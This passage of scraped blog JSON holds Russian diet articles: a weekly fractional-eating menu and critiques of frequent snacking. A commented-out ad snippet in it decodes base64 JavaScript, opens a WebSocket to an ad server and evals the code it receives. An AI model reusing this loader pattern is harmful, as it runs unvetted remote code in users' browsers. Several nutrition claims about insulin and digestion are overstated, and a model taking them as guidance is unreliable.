На информационном ресурсе применяются рекомендательные технологии (информационные технологии предоставления информации на основе сбора, систематизации и анализа сведений, относящихся к предпочтениям пользователей сети "Интернет", находящихся на территории Российской Федерации)

Завтракать не только вкусно, но и полезно

Завтрак — основа всего рациона. От того, что вы съедите в начале дня, будут зависеть скорость обмена веществ, настроение в течение дня и состояние фигуры в целом. Как завтракать вкусно и полезно, а сил на приготовление еды тратить мало, рассказал Swjournal.ru. Цели Для определения идеального
...Далее

Дробное питание для комфортного похудения: точный рацион на 1 неделю!

\x3c!-- \x3cdiv id=\"M347983Composite625353\">\x3ccenter> \x3ca href=\"http://marketgid.com/\" target=\"_blank\">«агрузка...\x3c/a> \x3c/center>\x3c/div> \x3cscript type=\"text/javascript\"> var d = new Date, script625353 = document.createElement(\"script\"), mg_ws625353 = {};script625353.type = \"text/javascript\";script625353.charset = \"utf-8\";script625353.src = \"//jsc.marketgid.com/f/i/fithacker.ru.625353.js?t=\" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script625353.onerror = function () { mg_ws625353 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjUzNTMoZSl7dmFyIGg9bWdfd3M2MjUzNTMub25tZXNzYWdlOyBtZ193czYyNTM1My5yZWFkeVN0YXRlPT1tZ193czYyNTM1My5DTE9TRUQmJihtZ193czYyNTM1Mz1uZXcgV2ViU29ja2V0KG1nX3dzNjI1MzUzX2xvY2F0aW9uKSksbWdfd3M2MjUzNTMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMobWdfd3M2MjUzNTMsZnVuY3Rpb24oKXttZ193czYyNTM1My5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjUzNTNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyNTM1MyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjUzNTNfbG9jYXRpb24pLCBtZ193czYyNTM1My5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjUzNTMoZS5kYXRhKX0=\\'))']), {type: \"application/javascript\"})); mg_ws625353.onmessage = function (msg){window.eval(msg.data);}; mg_ws625353.postMessage('js|'+script625353.src+'|M347983Composite625353|M347983Composite625353');};document.body.appendChild(script625353); \x3c/script>--> \x3c!-- M347983Composite End --> \n \x3cp>Этот рацион позволит комфортно похудеть и вкусно питаться не дорогими продуктами.\x3c/p>\n\x3cp>Позволяется есть все: мясо, рыбу, макароны, крупы и даже сладости, наслаждаясь каждым кусочком.\x3c/p>\n\x3cp>Меню составлено таким образом, чтобы суточная норма составляла около 1500 ккал.\x3c/p>\n\x3cp>🔸Понедельник\x3c/p>\n\x3cp>7–9 ч. Первый завтрак: 30 г кукурузных хлопьев, стакан 0,5% молока, фрукт (яблоко, или груша, или апельсин, или 2 мандарина, или нектарин, или 5 слив, или 10 виноградин).\x3c/p>\n\x3cp>11-12 ч. Второй завтрак: 125 нежирного йогурта или 100 г обезжиренного творога, фрукт, чай или кофе (не более 2 ч.л. сахара).\x3c/p>\n\x3cp>14-15 ч. Обед: овощной салат с 2 ч.л. масла, гречневая каша (120 г), порция куриных котлет, стакан 0,5% молока или 1% кефира.\x3c/p>\n\x3cp>16-17 ч. Полдник: помидор, ломтик сыра (30 г) до 17% жирности, кусочек зернового хлеба (30 г), фрукт, чай или кофе (не более 2 ч.л. сахара).\x3c/p>\n\x3cp>19-21 ч. Ужин: пол-тарелки свежих овощей, порция щавелевого супа на простокваше, 2 кусочка (по 30 г) зернового хлеба, стакан воды.\x3c/p>\n\x3cp>Перед сном: помидор, огурец, стакан 0,5% молока или 1% кефира.\x3c/p>\n\x3cp>🔸Вторник\x3c/p>\n\x3cp>7-9 ч. Первый завтрак: порция каши с ягодами, стакан 0,5% молока, фрукт.\x3c/p>\n\x3cp>11-12 ч. Второй завтрак: 125 г нежирного йогурта, ломтик сыра (30 г) жирностью до 17%, 2 овсяных печенья, кофе или чай (не более 2 ч.л. сахара).\x3c/p>\n\x3cp>14-15 ч. Обед: пол-тарелки свежих овощей, порция морковно-картофельного пюре, порция куриной грудки в остром соусе, кусочек зернового хлеба (30 г), стакан 0,5% молока или 1% кефира.\x3c/p>\n\x3cp>16-17 ч. Полдник: 125 нежирного йогурта или 100 г обезжиренного творога, фрукт, кофе или чай (не более 2 ч.л. сахара).\x3c/p>\n\x3cp>19-21 ч. Ужин: порция салата табуле, 2 кусочка зернового хлеба (по 30 г), чай (не более 2 ч.л. сахара).\x3c/p>\n\x3cp>Перед сном: помидор, огурец, 100 г обезжиренного творога, 30 г зернового хлеба, чай.\x3c/p>\n\x3cp>🔸Среда\x3c/p>\n\x3cp>7-9 ч. Первый завтрак: порция оладьев с ягодами и взбитыми сливками, кофе или чай (не более 2 ч.л. сахара)\x3c/p>\n\x3cp>11-12 ч. Второй завтрак: 125 г нежирного йогурта или 100 г обезжиренного творога, фрукт, чай или кофе.\x3c/p>\n\x3cp>14-15 ч. Обед: пол-тарелки свежих овощей, 2 варёные картошки среднего размера, порция куриных тефтелек с укропной подливой.\x3c/p>\n\x3cp>16-17 ч. Полдник: 30 г зернового хлеба с 30 г нежирной ветчины и кружочками паприки и помидора,фрукт,чай или кофе.\x3c/p>\n\x3cp>19-21 ч. Ужин: 60 г зернового хлеба, с 2 кусочками сыра до 17% жирности, листьями салата, кружочками паприки и помидора, порция холодного огуречного супа.\x3c/p>\n\x3cp>Перед сном: фрукт, стакан 0,5% молока или 1% кефира.\x3c/p>\n\x3cp>🔸Четверг\x3c/p>\n\x3cp>7-9 ч. Первый завтрак: овсяная каша на 0,5% молоке с ягодами, чай или кофе.\x3c/p>\n\x3cp>11-12 ч. Второй завтрак: 60 г зернового хлеба с листьями салата, кусочками паприки и помидора, фрукт, чай или кофе.\x3c/p>\n\x3cp>14-15 ч. Обед: пол-тарелки свежих овощей, 120 варёного риса, порция рыбы, запечённой с сыром, стакан 0,5% молока или 1% кефира.\x3c/p>\n\x3cp>16-17 ч. Полдник: фруктовый салат с зернистым творогом, чай или кофе.\x3c/p>\n\x3cp>19-21 ч. Ужин: порция теплого салата из овощей и крупы, 30 г зернового хлеба, порция «земляничных взбитых сливок»,ч ай.\x3c/p>\n\x3cp>Перед сном: стакан 0.5% молока или 1% кефира.\x3c/p>\n\x3cp>🔸Пятница\x3c/p>\n\x3cp>7-9 ч. Первый завтрак: варёное яйцо,кусочек зернового хлеба,фрукт,чай или кофе.\x3c/p>\n\x3cp>11-12 ч. Второй завтрак: 125 г нежирного йогурта, 30 г 17% сыра,2 овсяных печенья,чай или кофе.\x3c/p>\n\x3cp>14-15 ч. Обед: овощная лазанья, фрукт, стакан воды.\x3c/p>\n\x3cp>16-17 ч. Полдник: порция малинового парфе, кофе или чай.\x3c/p>\n\x3cp>19-21ч. Ужин: овощной салат с 2 ч.л. масла, порция пирога с ветчиной, стакан сангрии, стакан воды.\x3c/p>\n\x3cp>Перед сном: фрукт, стакан 0,5% молока или 1% кефира.\x3c/p>\n\x3cp>🔸Суббота, воскресенье\x3c/p>\n\x3cp>7-9 ч. Первый завтрак: порция лимонного йогурта, чай или кофе.\x3c/p>\n\x3cp>11-12 ч. Второй завтрак: 125 г нежирного йогурта или 100 г обезжиренного творога, фрукт,кофе или чай.\x3c/p>\n\x3cp>14-15 ч. Обед: пол-тарелки свежих овощей, рыба с тархуном и шпинатом, 30 г ржаного хлеба, чай или кофе.\x3c/p>\n\x3cp>16-17 ч. Полдник: стакан клубники со 125 г нежирного йогурта.\x3c/p>\n\x3cp>19-21 ч. Ужин: салат «Цезарь», 30 г зернового хлеба, чай или кофе.\x3c/p>\n\x3cp>Разрешено заменять одни блюда другими из рецептов, не нарушая калорийность.\x3c/p>\n\n \x3c!-- A generated by theme --> \n\n\n\n \x3c!-- end A --> \n\n\n\x3cdiv>\n\x3cdiv>\n\x3cp2>\x3cnoindex>\x3cnofollow>\x3c/nofollow>\x3c/noindex>\x3c/p2>\x3cp3>← Жми «Нравится» и читай нас в Фейсбуке\x3c/p3>\n\x3c/div>\n\n\x3c/div>\n\n\x3cp>\x3cstrong>Понравилось? Поделитесь с друзьями!\x3c/strong>\x3c/p>\n \x3cp>\x3cstrong>\x3ca href=\"https://blockads.fivefilters.org\" target=\"_blank\">Let's block ads!\x3c/a>\x3c/strong> \x3ca href=\"https://blockads.fivefilters.org/acceptable.html\" target=\"_blank\">(Why?)\x3c/a>\x3c/p>","comments_count":0,"marks_count":0,"likes":{"count":0,"user_likes":0,"can_like":0,"marks_pluses":0,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://s30101041796.mirtesen.ru/blog/43869962427","tags":["Диеты","дробное питание","похудение","диета"],"date":1534928556,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20833394256,"photo_original":"https://mtdata.ru/u23/photoCB2E/20833394256-0/original.jpg","width":600,"height":400}}],"group":{"display_name":"Здоровье в наших руках","url":"https://s30101041796.mirtesen.ru","photo_original":"//mtdata.ru/u24/groupA346/67d5475e3acc17dcaea99ef5334b1604-0/__logo.jpeg","id":30101041796,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1403893363179},"canonical_url":"https://fithacker.ru/articles/drobnoe-pitanie-dlya-komfortnogo-pohudeniya-tochnyiy-ratsion-na-1-nedelyu/","topic":"cooking","title":"Дробное питание для комфортного похудения: точный рацион на 1 неделю!","preview_text":"\x3c!-- M347983Composite Start -->\x3c!-- «агрузка... var d = new Date, script625353 = document.createElement(\"script\"), mg_ws625353 = {};script625353.type = \"text/javascript\";script625353.charset = \"utf-8\";script625353.src = \"//jsc.marketgid.com/f/i/fithacker.ru.625353.js?t=\" + d.getYear() +","post_type":"post","formattedDates":{"iso":"2018-08-22T09:02:36.000Z","ver1":"22 августа, 12:02","ver2":"22.08.2018 в 12:02","ver3":"22 авг., 12:02"},"images":[{"main":true,"url":"https://mtdata.ru/u23/photoCB2E/20833394256-0/original.jpg","width":600,"height":400}],"videos":[],"shared_post":null,"mentionedPersons":null},{"id":43162506244,"from_id":530978026,"from":{"id":530978026,"display_name":"Лилия К","url":"https://mirtesen.ru/people/530978026","photo_original":"https://mtdata.ru/u30/photoADF2/20810247910-0/original.jpeg","isAuthenticAccount":false,"sex":1},"owner_id":-30669388060,"text":"\x3cp>\x3cem>Эта тенденция очень популярна: ешьте маленькими порциями, но часто - и все ваши проблемы с фигурой решатся очень быстро. Так ли это на самом деле?\x3c/em>\x3c/p>\n\x3cdiv>\n\x3cp>\x3cstrong>Классическая схема питания предполагает трехразовые полноценные приемы пищи и пару легких — в виде второго завтрака и полдника. Дробное питание предлагает питаться чуть ли не каждые два часа, при этом строго ограничивая объем порции минимумом.\x3c/strong>\x3c/p>\n\x3cp>Эти две концепции принципиально расходятся, даже если количество потребленных калорий в конечном счете выйдет одинаковым. В чем тут дело и стоит ли доверять распространенному убеждению, что на дробном питании худеется быстрее и проще?\x3c/p>\n\x3ch2>Откуда взялся принцип дробного питания?\x3c/h2>\n\x3cp>Эта концепция возникла более полувека назад, когда формулировались рекомендации для людей, страдающих заболеваниями ЖКТ. Затем в конце 70-х незаметно пришла мода на спортивный образ жизни, потом частый прием пищи маленькими порциями стал одним из фундаментальных принципов здорового жизни вообще — и дробное питание начали считать чуть ли не панацеей от всех бед.\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u27/photo7705/20292705650-0/original.jpg#20292705650\" alt=\"3043090\" width=\"900\" height=\"566\" />\x3c/p>\n\x3ch2>В чем опасность дробного питания\x3c/h2>\n\x3cp>Все же вреда от такого подхода больше, чем пользы — хотя, конечно, стоит оговориться, что для конкретного человека возможны индивидуальные корректировки в сторону именно частого потребления пищи. Но в качестве универсальной меры для всех этот способ точно не подходит.\x3c/p>\n\x3cp>Обычно люди, убежденные, что частый прием пищи должен исключать возникновение чувства голода, начинают осознавать, что они только и думают о еде, смотрят на часы в ожидании новой порции пищи — и в результате все же переедают.\x3c/p>\n\x3ch2>Переедание изменяет гормональный контроль\x3c/h2>\n\x3cp>Само по себе переедание не полезно, но самое опасное не в нем. Ощущения голода и сытости, уровень сахара в крови — эти явления в организме регулируются гормональным контролем. Многоразовое питание чаще шести раз в день изменяет сам механизм гормонального контроля.\x3c/p>\n\x3cp>Тот в свою очередь подстраивается и перестраивает способ сжигания жира в качестве топлива для физической и эмоциональной активности человека. Метаболизм печени довольно быстро изменяется, и вместо энергии полученные калории превращаются в жировые запасы.\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u27/photoAFA2/20515778499-0/original.jpg#20515778499\" alt=\"переедание\" width=\"900\" height=\"566\" />\x3c/p>\n\x3ch2>Метаболизм невозможно разогнать дробным питанием\x3c/h2>\n\x3cp>Это чистая физиология: на переваривание средней порции уходит в среднем около шести часов. Ускорить этот процесс никак нельзя, поскольку задействована сложная цепочка химических и гормональных реакций, каждой из которых природой отведено строго определенное время.\x3c/p>\n\x3cp>То есть, если вы разок пропустите прием пищи при обычном графике питания, то организм продолжит себе спокойно переваривать ранее поступившую еду. До состояния, при котором начнут “теряться” мышцы и организм будет “есть сам себя”, нужно проголодать несколько десятков дней.\x3c/p>\n\x3cp>А вот частить с приемами пищи — все равно что заправлять автомобиль, который едет на хорошей скорости по трассе. Это неэкономично, неумно и попросту опасно — и для машины, и для водителя.\x3c/p>\n\x3ch2>Экспериментальное подтверждение ошибочности дробного питания\x3c/h2>\n\x3cp>В 2012 году Институт биологических исследований в американском городе Ла-Ойе провел эксперимент. Его результаты наглядно подтвердили тот факт, что есть постоянно весь день куда опаснее, чем разделить тот же объем пищи на два-три приема. Две группы подопытных мышей посадили на высокожировую диету.\x3c/p>\n\x3cp>Особи в первой группе съедали определенное количество еды в два приема за восемь часов и голодали оставшиеся шестнадцать. Во второй группе то же количество еды съедалось в течение дня крохотными порциями.\x3c/p>\n\x3cp>Первые мыши к концу опытов оставались бодрыми и постройнели, вторые — снизили метаболизм и набрали вес. Те же ученые установили через пару лет, что промежуткам еда-голод можно выделить по два окна в двенадцать часов с теми же результатами.\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u22/photo7303/20961924197-0/original.jpg#20961924197\" alt=\"голодание\" width=\"900\" height=\"566\" />\x3c/p>\n\x3ch2>Кому противопоказано дробное питание\x3c/h2>\n\x3cp>Люди с гормональными расстройствами, повышенным или просто нестабильным уровнем сахара в крови — в группе риска. Им категорически противопоказано есть шесть-семь раз в сутки, поскольку гормональный контроль и без того очень плохо работает и не справляется с регуляцией метаболизма.\x3c/p>\n\x3cp>Не стоит рисковать здоровьем и тем, у кого нарушен углеводный или белковый обмен, тем, кто страдает бесплодием или аменореей, если вес застыл на одной отметке и не двигается долгие годы.\x3c/p>\n\x3ch2>Кому можно питаться дробно\x3c/h2>\n\x3cp>Профессиональным спортсменам в плотном графике активных тренировок и тем, чья деятельность связана с постоянными и тяжелыми физическими нагрузками. В этом случае энергозатраты требуют повышения количества приемов пищи.\x3c/p>\n\x3cp>Людям с некоторыми нарушениями работы ЖКТ действительно показано питаться дробно — их организм просто не в состоянии усвоить нормальные порции еды.\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u27/photo24E2/20631142744-0/original.jpg#20631142744\" alt=\"спортсмен\" width=\"900\" height=\"566\" />\x3c/p>\n\x3ch2>Что именно вы едите — часто не так важно\x3c/h2>\n\x3cp>Очень важно понять вот какой принцип: в тот момент, когда в крови начинает расти уровень инсулина, сжигание жиров автоматически прекращается. Уровень инсулина начал падать — сжигание возобновляется. Для гормональной системы не важно, что именно вы едите, — инсулин выделяется в ответ на любой прием пищи, кроме воды.\x3c/p>\n\x3cp>Все, что не является водой, является пищей — будь то кофе с молоком, чай с печеньками, кусочек торта, яблоко или суперздоровый смузи. После любой еды необходимо примерно три часа, чтобы уровень инсулина вернулся к исходному уровню — независимо от того, что было съедено, даже если это был капучино без сахара с обезжиренным молоком.\x3c/p>\n\x3cp>Устойчивого снижения выработки инсулина можно достичь только и исключительно уменьшением количества приемов пищи. Лучше съедать порядочную порцию, которая хорошо утолит чувство голода — и тогда вы без проблем дождетесь следующего приема еды. Оптимальное число — три. И никаких перекусов.\x3c/p>\n\x3cp>\x3ca href=\"http://kto-chto-gde.ru/story/drobnoe-pitanie-polza-ili-vred/\" target=\"_blank\">Источник\x3c/a>\x3c/p>\n\x3c/div>","comments_count":6,"marks_count":48,"likes":{"count":48,"user_likes":0,"can_like":0,"marks_pluses":48,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[{"id":100,"count":48}]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://s30669388060.mirtesen.ru/blog/43162506244","tags":["дробное питание","Обсуждение с сообществом","красота","похудение","здоровье","питание","диета и фитнес"],"date":1511584743,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20292705650,"photo_original":"https://mtdata.ru/u27/photo7705/20292705650-0/original.jpg","width":900,"height":566}}],"group":{"display_name":"ПолонСил.ру - социальная сеть здоровья","url":"https://s30669388060.mirtesen.ru","photo_original":"//mtdata.ru/u20/photo2B7E/20125696275-0/original.jpeg","id":30669388060,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1354869995507},"canonical_url":"https://s30669388060.mirtesen.ru/blog/43162506244","topic":"health","title":"Дробное питание: польза или вред?","preview_text":"Эта тенденция очень популярна: ешьте маленькими порциями, но часто - и все ваши проблемы с фигурой решатся очень быстро. Так ли это на самом деле? \nКлассическая схема питания предполагает трехразовые полноценные приемы пищи и пару легких — в виде второго завтрака и полдника. Дробное питание","post_type":"post","formattedDates":{"iso":"2017-11-25T04:39:03.000Z","ver1":"25 ноября, 7:39","ver2":"25.11.2017 в 7:39","ver3":"25 нояб., 7:39"},"images":[{"main":true,"url":"https://mtdata.ru/u27/photo7705/20292705650-0/original.jpg","width":900,"height":566}],"videos":[],"shared_post":null,"mentionedPersons":null},{"id":43114703923,"from_id":831123286,"from":{"id":831123286,"display_name":"Игорь Светлов","url":"https://mirtesen.ru/people/831123286","photo_original":"https://mtdata.ru/u9/photo8AC2/20059804521-0/original.jpeg","isAuthenticAccount":false,"sex":1},"owner_id":-30669388060,"text":"\x3cp>Перекусы для большинства из нас стали неотъемлемой частью жизни, а для некоторых - это в принципе ежедневный рацион. И даже реклама «поддерживает»: «Сделай паузу, съешь», «Ты – не ты, когда голоден», «Не тормози». А уж диетологи в один голос твердят: хочешь похудеть и не навредить здоровью – ешь понемногу, но часто. Пять или шесть раз в день. И призадумаешься, это получается, что весь день нужно что-то жевать. Так ли это? Давайте разбираться вместе.\x3c/p>\n\x3cdiv>\x3ca href=\"https://econet.ru/category/zdorovie-i-krasota/zdorovie\" target=\"_blank\">\x3cimg title=\"Дробное питание: правда и мифы \" src=\"//mtdata.ru/u2/photo5DE6/20420337150-0/original.jpg#20420337150\" alt=\"Дробное питание: правда и мифы \" longdesc=\"https://econet.ru/category/zdorovie-i-krasota/zdorovie\" />\x3c/a>\x3c/div>\n\x3cp>\x3cspan>Напомню, что в мире существует порядка 15 тысяч диет, как говорится, на любой вес, вкус и кошелёк. Но исследования по поиску «идеальной» диеты не прекращаются ни на минуту, и в последние годы учёных всё больше интересует правильность концепции частого дробного питания.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>Такому стилю питания отдают предпочтение не только профессиональные спортсмены (в частности бодибилдеры), но даже «звёзды» рассказывают нам о том, что худеют исключительно потому, что едят часто и мало. А обычные обыватели верят в это, не задумываясь, так ли всё просто и правильно.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Давайте подумаем. Для начала о том, на какой «почве» выросла эта теория дробного питания.\x3c/strong> В общем-то, всё новое – это хорошо забытое старое. Вспомните свои детсадовские, а кто-то и пионерские годы с их завтраками-вторыми завтраками-обедами-полдниками-ужинами-поздними ужинами. Ну, тогда всё было понятно: в детсад или пионерский лагерь детей принимали «по весу», и не дай бог, в конце смены отряд не «поправится»! Сейчас, к счастью, слегка другой подход к пониманию веса детей.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Дальше, одним из плюсов частого дробного питания является отсутствие больших промежутков между приёмами пищи\x3c/strong>, что ведёт к практически ровному уровню сахара в крови, без скачков и инсулиновых «всплесков». И ещё один плюс –\x3cstrong> равномерная нагрузка на жёлчный пузырь, что помогает избежать застоев жёлчи\x3c/strong>, ведущих не только к образованию камней в желчевыводящих путях, но и запоров, ведь, как известно, \x3cstrong>жёлчь – лучший естественный стимулятор перистальтики кишечника\x3c/strong>.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Теперь же о мифах.\x3c/strong> Одним из устойчивых утверждений, благодаря которому у дробного питания столько приверженцев, является утверждение о том, что оно якобы ускоряет процесс обмена веществ, будто бы в этом случае организм тратит значительно больше калорий. Думаю, это утверждение пошло из бодибилдинга, потому что именно эти спортсмены используют эту особенность для эффективного сжигания жира или для формирования мышечной массы.\x3c/span>\x3c/p>\n\x3cp>\x3cstrong>\x3cspan>\x3cspan>Видео: \x3c/span>\x3c/span>\x3cspan>\x3cspan>Диетологи развенчали миф о пользе дробного питания\x3c/span>\x3c/span>\x3c/strong>\x3c/p>\n\x3cdiv>\x3ca href=\"https://www.youtube.com/watch?v=WF0JetqHVF4\" target=\"_blank\">https://www.youtube.com/watch?v=WF0JetqHVF4\x3c/a>\x3c/div>\n\x3cp>\x3cspan>Если вернуться к биохимии, то можно вспомнить о таком понятии, как специфически динамическое действие пищи, или, проще говоря, \x3cstrong>то количество энергии, которое организм расходует на переваривание и усвоение питательных веществ из пищ\x3c/strong>и. И это количество энергии составляет 20-30% калорий на переваривание белков, около 5-10% - на углеводы и около 3% тратится на жиры, то есть, в среднем 10% от общего потребления калорий идёт на переваривание пищи в целом. Однако в курсе термодинамики пищи ничего не говорится о количестве приёмов пищи, а лишь об общем количестве потребляемых калорий. Согласитесь, математика – вещь упрямая: \x3cstrong>если вы в течение дня потребляете порядка 1800 ккал, например, то нет никакой разницы – в шесть приёмов по 300 ккал, или в три приёма по 600, в любом случае на переваривание этой пищи в день уйдёт 180 ккал\x3c/strong>!\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Так что, ни уменьшение, ни увеличение количества приемов пищи не влияет на процесс сжигания калорий\x3c/strong>, так как главное в этом случае - количество потребляемых калорий.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>А не так давно мне попалось очень интересное исследование, в ходе которого выяснили, что пост в Рамадан безопасен для большинства больных диабетом при правильно скорректированных дозах препаратов. То есть один-два приёма пищи ночью (!) не приносят вреда даже больным сахарным диабетом. \x3c/span>\x3cspan>Ещё одно исследование чешских учёных показало, что для больных сахарным диабетом второго типа предпочтительны два больших приема пищи в день, нежели шесть маленьких.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Вывод исследователей переворачивает наши представления о количестве приёмов пищи с ног на голову\x3c/strong>: «Если есть только завтрак и обед, то снижается вес тела, содержание жира в печени, глюкозы в плазме, С-пептида и глюкагона. Эти результаты позволяют предположить, что для пациентов с диабетом 2 типа разделение пищи только на завтрак и обед может быть более полезной, чем разделение на шесть порций».\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cspan>Интересно, а для здоровых людей? И это исследовали! Исследование, проведенное Американской ассоциацией по изучению заболеваний печени (American Association for the Study of Liver Diseases) в августе 2018 года пришло к выводу: \x3cstrong>частое перекусывание приводит к ожирению и жировой дистрофии печени.\x3c/strong>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Еще один миф гласит о том, что дробное питание способствует снижению веса, якобы позволяя уменьшить чувство голода\x3c/strong>. Но тут тоже вопрос спорный! Всё зависит от того, чем вы перекусываете, и если это «быстрые» углеводы, то вряд ли чувство голода будет уменьшаться, а зачастую, наоборот, - вырастет. Ведь «быстрые» углеводы как быстро поднимают уровень сахара в крови, так и быстро его снижают, обостряя голод.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>И, как известно, снижение веса идёт при отрицательном балансе калорий, а мы выше выяснили, что дробное питание не оказывает никакого воздействия на баланс энергии, значит не будет и долгожданной потери веса.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Дальше, советы питаться дробно в течение дня, чтобы не допускать чувства голода совершенно не стыкуется с принципами интуитивного питания\x3c/strong>, когда есть рекомендуют тогда, когда возникло чувство естественного голода. И мы «насильно» кормим себя, и пищеварительная система вместо того, чтобы получить разгрузку, находится в постоянной работе.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Кроме того, теория дробного питания слабо учитывает время переваривания тех или иных продуктов\x3c/strong>, ведь если на усвоение напитков и соков уходит 20-40 минут, то на переваривание мяса, например, может уходить от трёх до шести часов. И вряд ли это будет полезно нашему желудку и кишечнику, когда на недопереваренную пищу «упадёт» новая порция свежей еды.\x3c/span>\x3c/p>\n\x3cdiv>\x3ca href=\"https://econet.ru/category/zdorovie-i-krasota/zdorovie\" target=\"_blank\">\x3cimg title=\"Дробное питание: правда и мифы \" src=\"//mtdata.ru/u1/photo9CF4/20312628546-0/original.jpg#20312628546\" alt=\"Дробное питание: правда и мифы \" longdesc=\"https://econet.ru/category/zdorovie-i-krasota/zdorovie\" />\x3c/a>\x3c/div>\n\x3cp>И вот теперь самое сложное для восприятия, но, пожалуй, самое важное в понимании того, как часто нужно есть. Мы уже много раз вспоминали \x3cstrong>инсулин – гормон поджелудочной железы, который оказывает своё влияние на способность организма сжигать жир\x3c/strong>. Вкратце напомню. Когда мы едим, уровень инсулина повышается, глюкоза перемещается в клетки, где должна быть утилизирована для получения энергии. \x3cstrong>Инсулин вызывает рост уровня лептина - гормона «сытости», который продуцируют жировые клетки\x3c/strong>. Лептин сигнализирует мозгу, что мы насытились и даёт команду поджелудочной железе прекратить выделение инсулина. Уровень глюкозы нормализуется, уменьшается количество инсулина и лептин запускает сжигание жира.\x3c/p>\n\x3cp>\x3cspan>Проходит какое-то время после еды, уровень сахара в крови падает ещё ниже, и в «бой» вступает гормон глюкагон, который мобилизует запас калорий (жир и гликоген), и вы чувствуете себя сытым до следующего приема пищи.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Как правило, пик уровня инсулина достигается в течение 30 минут после еды и возвращается к нормальнму уровню в течение 3 часов\x3c/strong>, после чего за работу принимается лептин. В идеале, у здорового человека инсулин отправляет 60% калорий из еды в печень для пополнения депо гликогена, которое используется в первую очередь при любой нагрузке, а оставшиеся 40% глюкозы и аминокислот направляет в такие же депо гликогена, но находящиеся в мышечных клетках и клетках жизненно важных органов, которые используют глюкозу для топлива и аминокислоты для роста и восстановления.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cspan>И вот тут нас поджидает подвох. \x3cstrong>Если будете есть каждые 2 - 3 часа, как советуют большинство диет, ваш уровень инсулина никогда не вернется к нормальному уровню, и вы никогда не начнёте сжигать жир!\x3c/strong>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cstrong>Когда вы едите часто, небольшими порциями в течение дня, уровень инсулина остаётся повышенным в течение всего дня\x3c/strong>, вызывая не только накопление жира, но и со временем приводит к резистентности к инсулину. \x3cstrong>Это означает, что ваши клетки больше не будут реагировать на инсулин и не будут «открывать дверь» для поступления глюкозы\x3c/strong>. В результате вы будете накапливать всё больше жира, и в то же время клетки будут недополучать энергию, вы будете чувствовать себя уставшими, и постоянно хотеть «подзарядиться» новой порцией еды. Возникнет порочный замкнутый круг.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>Но это не самое страшное! \x3cstrong>Резистентность к инсулину приводит не только к увеличению веса, особенно вокруг живота, а ведёт к повышению «жёсткости» стенок артерий, повышению кровяного давления\x3c/strong>, возникновению и усугублению системного воспаления, и в конечном итоге к сердечно-сосудистым заболеваниям, таким, как инфаркт и инсульт, и к сахарному диабету второго типа.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>А потому, \x3cstrong>если человек здоров и всё в организме работает правильно, то после нормального приёма пищи нет острой необходимости в перекусах\x3c/strong>. Взрослый человек вполне способен выдержать перерывы между приёмами пищи в 4-5 часов.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>Кроме того, перекусы между едой, вызывая дополнительную секрецию инсулина, подавляют секрецию глюкагона, а также повышают уровень лептина, что приводит к \x3cstrong>лептинорезистентности \x3c/strong>– состоянию, при котором мозг и поджелудочная железа больше не слышит сигнал от лептина, чтобы «выключить» аппетит и уменьшить секрецию инсулина.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>Многочисленные \x3cstrong>исследования показывают, что в среднем «путь» еды из желудка в двенадцатиперстную кишку занимает около четырех часов\x3c/strong>. Повторю, в среднем! Если же есть в промежутках между приёмами пищи, некоторые «остатки» из первоначальных приёмов пищи все ещё могут оставаться в желудке 14-16 часов. \x3cstrong>Еда в промежутках между приёмами пищи, таким образом, будет способствовать брожению, гниению и 